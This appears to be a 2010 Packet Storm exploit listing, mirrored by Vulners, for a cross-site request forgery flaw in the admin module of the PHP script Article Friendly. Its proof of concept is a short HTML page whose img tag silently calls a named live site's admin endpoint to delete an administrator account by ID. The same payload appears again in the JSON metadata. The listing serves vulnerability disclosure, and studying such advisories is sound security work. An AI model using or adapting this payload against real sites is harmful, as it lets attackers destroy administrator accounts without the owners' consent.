Search...

Article Friendly Cross Site Request Forgery

2010-02-25T00:00:00

ID PACKETSTORM:86669
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-02-25T00:00:00

Description

                                        
                                            ` =======================================================================  
  
Article friendly CSRF Vulnerability  
  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
  
# Vulnerability found in- Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Site p4ge http://www.articlefriendly.com/  
  
# Plateform php  
  
  
  
# Proof of concept #  
  
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin  
  
  
Script to delete the Admin user through Cross Site request forgery  
  
. ..................................................................................................................  
  
&lt;html&gt;  
  
&lt;body&gt;  
  
&lt;img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] /&gt;  
  
&lt;/body&gt;  
  
&lt;/html&gt;  
  
  
. ..................................................................................................................  
  
  
  
After execution refresh the page and u can see that user having giving ID get deleted automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:86669", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Article Friendly Cross Site Request Forgery", "description": "", "published": "2010-02-25T00:00:00", "modified": "2010-02-25T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/86669/Article-Friendly-Cross-Site-Request-Forgery.html", "reporter": "Pratul Agrawal", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:56", "viewCount": 2, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-11-03T10:16:56", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:56", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/86669/articlefriendly-xsrf.txt", "sourceData": "` ======================================================================= \n \nArticle friendly CSRF Vulnerability \n \n======================================================================= \n \nby \n \nPratul Agrawal \n \n \n \n# Vulnerability found in- Admin module \n \n# email Pratulag@yahoo.com \n \n# company aksitservices \n \n# Credit by Pratul Agrawal \n \n# Site p4ge http://www.articlefriendly.com/ \n \n# Plateform php \n \n \n \n# Proof of concept # \n \nTargeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin \n \n \nScript to delete the Admin user through Cross Site request forgery \n \n. .................................................................................................................. \n \n<html> \n \n<body> \n \n<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] /> \n \n</body> \n \n</html> \n \n \n. .................................................................................................................. \n \n \n \nAfter execution refresh the page and u can see that user having giving ID get deleted automatically. \n \n \n#If you have any questions, comments, or concerns, feel free to contact me. \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}}